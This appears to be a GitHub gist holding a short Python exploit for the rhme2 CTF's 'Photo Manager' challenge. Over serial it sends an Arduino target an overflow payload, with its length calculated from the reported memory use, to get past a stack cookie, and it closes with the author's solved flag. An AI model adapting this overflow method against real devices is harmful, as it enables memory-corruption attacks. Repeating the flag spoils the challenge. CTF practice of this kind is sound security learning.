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Last active February 17, 2024 18:16
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Fast exploit for the rhme2 CTF. For the challenge Photo Manager. Written in Python3. Breaks a a stack cookie.
#!/usr/bin/env python3
import serial
import time
arduino = serial.Serial('/dev/ttyUSB0', 19200, timeout=0.1)
print('Port not found')
def read_until(until):
arduino_data = ''
while until not in arduino_data:
arduino_data += str(arduino.readline())
return arduino_data
# read the used memory
read_until('[2] Memory management')
used_memory = read_until('Memory space used:').split(' ')[7]
read_until('[2] Memory management')
arduino.write(str.encode('A' * (4096 - int(used_memory) - 8) + chr(4088 - int(used_memory))))
print(read_until('[2] Memory management'))
# Flage shows with the keyword: FLAG
# In my case: FLAG:D1d_y0u_sm4sh_my_stack_bro?
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